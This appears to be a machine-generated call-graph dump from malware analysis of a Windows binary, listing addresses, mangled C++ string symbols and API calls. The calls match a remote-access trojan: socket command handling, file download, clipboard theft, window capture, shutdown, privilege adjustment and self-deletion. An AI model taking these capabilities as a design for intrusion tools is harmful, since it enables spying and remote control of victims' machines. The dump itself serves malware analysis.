??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16279->16281 16280->16261 16281->16279 16283 413a79 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16282->16283 16284 4139d0 16282->16284 16283->16283 16283->16284 16284->16250 16286 401919 16285->16286 16287 40191b ??2@YAPAXI 16285->16287 16286->16287 16287->16264 16291 401927 16288->16291 16292 401934 16291->16292 16293 4018f9 16292->16293 16294 40193a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16292->16294 16293->16266 16294->16293 16298 40194f 16295->16298 16301 40195e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16298->16301 16302 401970 ??3@YAXPAX 16301->16302 16303 40190a 16301->16303 16302->16303 16303->16274 16305 40a2ae 16304->16305 16306 40a2b3 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16305->16306 16307 40a193 16305->16307 16306->16305 16307->15884 16308->15888 16309->15900 16311 4018c8 16310->16311 16312 40190f ??2@YAPAXI 16311->16312 16313 4018d5 16312->16313 16313->15904 16314->15946 16317 41242b 16315->16317 16316 412487 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16316->15954 16317->16316 16319 402044 16318->16319 16320 40204d socket 16318->16320 16366 402074 WSAStartup 16319->16366 16321 40205f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16320->16321 16321->15964 16323 402049 16323->16320 16323->16321 16324->16021 16326 402595 16325->16326 16327 40262f 16325->16327 16328 40259e 16326->16328 16329 402613 CreateThread 16326->16329 16330 4025ac 7 API calls 16326->16330 16331 4122eb 16327->16331 16328->16329 16329->16327 16367 4027a2 16329->16367 16330->16329 16379 4122c4 GlobalMemoryStatusEx 16331->16379 16333 40cb09 sprintf ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ _itoa 16333->15993 16334->16000 16335->16000 16336->16009 16338 4126b1 GetTickCount 16337->16338 16338->16009 16339->16009 16340->16009 16341->16009 16342->16012 16380 402440 6 API calls 16343->16380 16345 4020df ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16345->16014 16347 402172 malloc recv 16346->16347 16348 402191 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16347->16348 16349 4021da free 16347->16349 16348->16349 16350 4021c9 16348->16350 16349->16347 16351 4021e6 16349->16351 16386 40221e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 16350->16386 16405 4020f4 closesocket 16351->16405 16354 402201 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16354->16018 16355 4021ed 16355->16354 16406 402750 16355->16406 16358 405d45 16357->16358 16359 405cda ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16357->16359 16358->16018 17069 405dd3 10 API calls 16359->17069 16361 405cf6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16362 41203b 13 API calls 16361->16362 16363 405d1f CloseHandle 16362->16363 16363->16358 16364 405d36 16363->16364 16364->16358 16365 405d3c UnhookWindowsHookEx 16364->16365 16365->16358 16366->16323 16370 4027b1 16367->16370 16371 4027e4 16370->16371 16372 4027c5 16370->16372 16373 4027ad 16371->16373 16375 4027f1 7 API calls 16371->16375 16376 402857 16371->16376 16372->16373 16374 4027ce Sleep 16372->16374 16374->16371 16374->16372 16375->16376 16378 4020f4 closesocket 16376->16378 16378->16373 16379->16333 16381 4024a2 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send 16380->16381 16382 4024c4 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16380->16382 16384 40250f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16381->16384 16383 40309e 4 API calls 16382->16383 16385 4024e6 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16383->16385 16384->16345 16385->16384 16387 40223e ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16386->16387 16388 402254 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16387->16388 16389 40228b ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16387->16389 16391 40309e 4 API calls 16388->16391 16390 402297 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16389->16390 16411 4023f0 strncmp 16390->16411 16392 402276 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16391->16392 16392->16390 16395 4023e0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16395->16349 16396 4022b9 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16397 4022d0 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16396->16397 16398 4023d2 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16396->16398 16399 4022f2 6 API calls 16397->16399 16400 4022e6 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16397->16400 16398->16395 16401 402344 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16399->16401 16402 40235c ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 16399->16402 16400->16399 16404 402357 16401->16404 16403 402398 ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16402->16403 16413 40d2a6 6 API calls 16402->16413 16403->16395 16403->16404 16404->16387 16404->16403 16405->16355 16407 40275d 16406->16407 16410 402790 16406->16410 16408 402763 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16407->16408 16407->16410 16409 41203b 13 API calls 16408->16409 16409->16410 16410->16354 16412 4022ae 16411->16412 16412->16395 16412->16396 16414 4129eb 21 API calls 16413->16414 16415 40d317 16414->16415 16416 40de23 16415->16416 16417 40dd54 16415->16417 16418 40d329 16415->16418 16419 40de30 16416->16419 16420 40e3a3 16416->16420 16440 40dd68 16417->16440 16441 40dd5e Sleep 16417->16441 16424 40d4cf 16418->16424 16425 40d33c GetTickCount 16418->16425 16533 40d4ab 16418->16533 16421 40de36 16419->16421 16422 40e2f7 16419->16422 16426 40e3e0 16420->16426 16427 40e3c0 16420->16427 16428 40e542 16420->16428 16429 40e404 16420->16429 16430 40e624 16420->16430 16431 40e525 16420->16431 16432 40e5a9 16420->16432 16433 40e62b 16420->16433 16434 40e4cc 16420->16434 16435 40e5f6 16420->16435 16436 40e639 16420->16436 16437 40e57c 16420->16437 16438 40e55f 16420->16438 16439 40e59f 16420->16439 16464 40e493 16420->16464 16420->16533 16452 40de51 16421->16452 16453 40df81 16421->16453 16454 40e093 16421->16454 16455 40e1a3 16421->16455 16456 40e1f4 16421->16456 16457 40e214 16421->16457 16458 40e116 16421->16458 16459 40e186 16421->16459 16460 40e1ea 16421->16460 16461 40e12d OpenClipboard 16421->16461 16421->16533 16639 40def3 16421->16639 16423 40180c 4 API calls 16422->16423 16444 40e301 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16423->16444 16483 402750 15 API calls 16424->16483 16657 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16425->16657 16472 40180c 4 API calls 16426->16472 16468 40180c 4 API calls 16427->16468 16445 40180c 4 API calls 16428->16445 16446 40180c 4 API calls 16429->16446 16916 411a24 16430->16916 16470 40180c 4 API calls 16431->16470 16462 40e5b3 16432->16462 16463 40e5d7 ShowWindow SetForegroundWindow 16432->16463 16932 411b80 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16433->16932 16465 40180c 4 API calls 16434->16465 16467 40180c 4 API calls 16435->16467 16449 4030ec 86 API calls 16436->16449 16450 40180c 4 API calls 16437->16450 16448 40180c 4 API calls 16438->16448 16901 411bd0 16439->16901 16469 40180c 4 API calls 16440->16469 16441->16417 16442 4017dd 3 API calls 16471 40e6a9 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16442->16471 16759 4126ef GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 16444->16759 16489 40e54c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16445->16489 16475 40e40e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ StrToIntA 16446->16475 16490 40e569 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16448->16490 16478 40e63e 16449->16478 16491 40e586 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16450->16491 16515 40de65 16452->16515 16516 40de5b Sleep 16452->16516 16714 40ec0f GetCurrentProcess OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 16453->16714 16454->16533 16536 40e09e EmptyClipboard 16454->16536 16479 40180c 4 API calls 16455->16479 16482 40180c 4 API calls 16456->16482 16485 40180c 4 API calls 16457->16485 16458->16533 16539 40e121 EmptyClipboard 16458->16539 16476 40180c 4 API calls 16459->16476 16727 407b1c 16460->16727 16474 40e13c GetClipboardData GlobalLock GlobalUnlock CloseClipboard 16461->16474 16461->16533 16493 413d3d 4 API calls 16462->16493 16463->16533 16492 40180c 4 API calls 16464->16492 16484 40e4d6 16465->16484 16495 40e602 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI 16467->16495 16496 40e3ca ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16468->16496 16486 40dd72 16469->16486 16487 40e52f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16470->16487 16473 40e3ea ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16472->16473 16812 404ea7 _EH_prolog 16473->16812 16498 40e160 16474->16498 16499 40e165 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16474->16499 16500 40180c 4 API calls 16475->16500 16501 40e190 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16476->16501 16477 40180c 4 API calls 16502 40df08 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16477->16502 16503 40180c 4 API calls 16478->16503 16504 40e1bc ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16479->16504 16506 40e1fe ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16482->16506 16483->16533 16841 412881 7 API calls 16484->16841 16508 40e21e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16485->16508 16667 412881 7 API calls 16486->16667 16847 410528 16487->16847 16856 4019e1 16489->16856 16868 40e7f7 16490->16868 16491->16533 16884 40e927 9 API calls 16491->16884 16517 40e4b0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi ShowWindow 16492->16517 16518 40e5ba CreateThread 16493->16518 16494 40d34f 16519 41269b GetTickCount 16494->16519 16520 40180c 4 API calls 16495->16520 16803 403bec 16496->16803 16498->16499 16522 4020c2 23 API calls 16499->16522 16523 40e429 16500->16523 16715 406dd9 CreateFileMappingA MapViewOfFileEx CloseHandle 16501->16715 16525 40180c 4 API calls 16502->16525 16526 40e64a 16503->16526 16719 412553 16504->16719 16505 40df86 16528 40180c 4 API calls 16505->16528 16741 40ef5a 16506->16741 16750 40c75e 16508->16750 16511 40e322 16760 40ec69 16511->16760 16535 40180c 4 API calls 16515->16535 16516->16452 16517->16533 16518->16533 16537 40d35a 16519->16537 16538 40e61a 16520->16538 16522->16533 16820 412881 7 API calls 16523->16820 16541 40df28 16525->16541 16937 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16526->16937 16544 40df96 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16528->16544 16530 40e4e3 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16545 40180c 4 API calls 16530->16545 16532 40dd7f ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16546 40180c 4 API calls 16532->16546 16533->16442 16548 40de6f 16535->16548 16549 40180c 4 API calls 16536->16549 16658 412718 _itoa ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 16537->16658 16911 411b59 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 16538->16911 16552 40e127 CloseClipboard 16539->16552 16712 412881 7 API calls 16541->16712 16543 40e1ca 16543->16533 16567 406dd9 5 API calls 16543->16567 16556 40dfc2 16544->16556 16557 40dfa5 16544->16557 16558 40e4f8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi SetWindowTextW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16545->16558 16559 40dd93 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16546->16559 16708 412881 7 API calls 16548->16708 16562 40e0ad ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GlobalAlloc GlobalLock 16549->16562 16552->16461 16553 40e436 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16564 4135de 37 API calls 16553->16564 16555 40e65e ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16566 4020c2 23 API calls 16555->16566 16569 40180c 4 API calls 16556->16569 16568 40180c 4 API calls 16557->16568 16570 40e51b 16558->16570 16571 4135de 37 API calls 16559->16571 16560 40180c 4 API calls 16572 40e33c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16560->16572 16574 40180c 4 API calls 16562->16574 16563 40d367 16659 412660 GetForegroundWindow GetWindowTextW ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@ 16563->16659 16576 40e44c ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16564->16576 16565 40df35 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16577 40180c 4 API calls 16565->16577 16578 40e689 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16566->16578 16579 40e1dd ??3@YAXPAX 16567->16579 16581 40dfb0 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16568->16581 16582 40dfd0 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16569->16582 16842 40ebbe 16570->16842 16583 40dda7 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16571->16583 16584 40180c 4 API calls 16572->16584 16573 40de7c ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16585 40180c 4 API calls 16573->16585 16586 40e0d8 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ GlobalUnlock SetClipboardData 16574->16586 16589 40180c 4 API calls 16576->16589 16590 40df4b 16577->16590 16591 40e69b ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16578->16591 16579->16533 16592 40e02c ExitWindowsEx 16581->16592 16593 40dff8 16582->16593 16594 40dfd9 16582->16594 16595 40180c 4 API calls 16583->16595 16596 40e352 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16584->16596 16597 40de90 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16585->16597 16586->16552 16587 40d377 16660 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16587->16660 16599 40e46f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16589->16599 16713 412881 7 API calls 16590->16713 16591->16533 16592->16533 16602 40180c 4 API calls 16593->16602 16601 40180c 4 API calls 16594->16601 16603 40ddcc 16595->16603 16604 40180c 4 API calls 16596->16604 16605 4135de 37 API calls 16597->16605 16598 40d384 16606 40180c 4 API calls 16598->16606 16607 412e4e 7 API calls 16599->16607 16609 40dfe4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16601->16609 16610 40e006 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16602->16610 16668 412881 7 API calls 16603->16668 16612 40e368 16604->16612 16613 40dea4 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16605->16613 16614 40d394 6 API calls 16606->16614 16615 40e480 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16607->16615 16608 40df58 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ MessageBoxW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16608->16453 16609->16592 16616 40e038 LoadLibraryA GetProcAddress 16610->16616 16617 40e00f 16610->16617 16764 412881 7 API calls 16612->16764 16620 40180c 4 API calls 16613->16620 16621 4020c2 23 API calls 16614->16621 16821 4133fe 16615->16821 16624 40180c 4 API calls 16616->16624 16623 40180c 4 API calls 16617->16623 16618 40ddd9 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ URLDownloadToFileW ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16625 40de04 ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 16618->16625 16626 40de18 16618->16626 16628 40dec7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16620->16628 16630 40d3fc 9 API calls 16621->16630 16631 40e01a ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16623->16631 16632 40e05f ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16624->16632 16669 4085ac 16625->16669 16626->16416 16627 40e374 16634 40180c 4 API calls 16627->16634 16709 412e4e ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16628->16709 16636 40180c 4 API calls 16630->16636 16631->16592 16637 40e072 16632->16637 16656 40d49c 16632->16656 16638 40e380 16634->16638 16635 40ded8 16635->16639 16640 40dedf ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@ 16635->16640 16641 40d472 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16636->16641 16642 40180c 4 API calls 16637->16642 16765 412881 7 API calls 16638->16765 16639->16477 16644 4085ac 101 API calls 16640->16644 16645 40d4b0 16641->16645 16646 40d486 16641->16646 16647 40e080 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16642->16647 16644->16639 16649 40180c 4 API calls 16645->16649 16652 40d4a1 16646->16652 16653 40d494 16646->16653 16647->16533 16647->16656 16648 40e38c 16766 40477e _EH_prolog ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ socket connect 16648->16766 16651 40d4be ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 16649->16651 16651->16424 16651->16533 16655 402580 17 API calls 16652->16655 16661 402637 16653->16661 16655->16533 16656->16533 16657->16494 16658->16563 16659->16587 16660->16598 16662 402739 16661->16662 16663 40264a 16661->16663 16662->16656 16663->16662 16664 4026d0 16663->16664 16665 40266b 7 API calls 16663->16665 16664->16662 16666 4026d8 7 API calls 16664->16666 16665->16664 16666->16662 16667->16532 16668->16618 16938 40ac8c TerminateProcess WaitForSingleObject 16669->16938 16671 4085ba 16672 4085cd 16671->16672 16939 406d41 TerminateThread 16671->16939 16674 4085db 16672->16674 16944 41050f ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16672->16944 16675 4085e4 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16674->16675 16680 4085f5 16674->16680 16947 412bee wcscpy wcscat wcscpy wcscat FindFirstFileW 16675->16947 16678 408611 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16962 40b9e8 RegOpenKeyExW 16678->16962 16679 408621 16682 408641 16679->16682 16683 40862d ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16679->16683 16680->16678 16680->16679 16685 408668 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 16682->16685 16686 40864d ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 16682->16686 16684 40b9e8 2 API calls 16683->16684 16684->16682 16687 40b692 3 API calls 16685->16687 16688 40b9e8 2 API calls 16686->16688 16689 4086a5 16687->16689 16690 408665 16688->16690 16691 4086bc ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ RegDeleteKeyA SetFileAttributesW 16689->16691 16692 4086ac GetModuleFileNameW 16689->16692 16690->16685 16693 4086e9 16691->16693 16694 4086ec ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16691->16694 16692->16691 16693->16694 16695 408712 7 API calls 16694->16695 16696 408703 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ SetFileAttributesW 16694->16696 16697 4087d7 7 API calls 16695->16697 16698 40877a 7 API calls 16695->16698 16696->16695 16699 408849 ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG 16697->16699 16700 40883b ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG 16697->16700 16698->16697 16701 408898 15 API calls 16699->16701 16702 40885c ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@ ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16699->16702 16700->16699 16965 412d56 16701->16965 16702->16701 16705 408961 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ShellExecuteW 16706 408986 ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE 16705->16706 16707 40897f exit 16705->16707 16706->16626 16707->16706 16708->16573 16710 412d56 4 API calls 16709->16710 16711 412e70 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16710->16711 16711->16635 16712->16565 16713->16608 16714->16505 16716 406e20 16715->16716 16980 406e38 16716->16980 16718 406e26 16718->16656 16985 413ed0 16719->16985 16721 412560 InternetOpenA InternetOpenUrlA 16722 4125a2 16721->16722 16723 412649 InternetCloseHandle InternetCloseHandle 16721->16723 16724 4125a9 InternetReadFile 16722->16724 16725 4125cb ??2@YAPAXI ??3@YAXPAX 16722->16725 16726 412622 ??2@YAPAXI 16722->16726 16723->16543 16724->16722 16724->16725 16725->16724 16726->16723 16728 402038 2 API calls 16727->16728 16729 407b2b 16728->16729 16987 40209b connect 16729->16987 16731 407b40 16732 407b49 16731->16732 16733 407b5f 16731->16733 16988 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16732->16988 16989 412855 ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ 16733->16989 16736 407b59 16737 4020c2 23 API calls 16736->16737 16738 407b7a 16737->16738 16739 402149 691 API calls 16738->16739 16740 407b88 16739->16740 16740->16533 16742 402038 2 API calls 16741->16742 16743 40ef6c 16742->16743 16990 40209b connect 16743->16990 16745 40ef81 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16746 4020c2 23 API calls 16745->16746 16747 40ef99 16746->16747 16748 402149 689 API calls 16747->16748 16749 40efa7 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16748->16749 16749->16533 16751 402038 2 API calls 16750->16751 16752 40c770 16751->16752 16991 40209b connect 16752->16991 16754 40c785 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 16755 4020c2 23 API calls 16754->16755 16756 40c79d 16755->16756 16757 402149 689 API calls 16756->16757 16758 40c7ab ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 16757->16758 16758->16533 16759->16511 16761 40ec77 16760->16761 16992 40ec84 16761->16992 16763 40e332 16763->16560 16764->16627 16765->16648 16767 404bd4 _CxxThrowException ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 16766->16767 16768 4047cf ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0 16766->16768 16769 404ea7 6 API calls 16767->16769 16770 402440 21 API calls 16768->16770 16772 404bf1 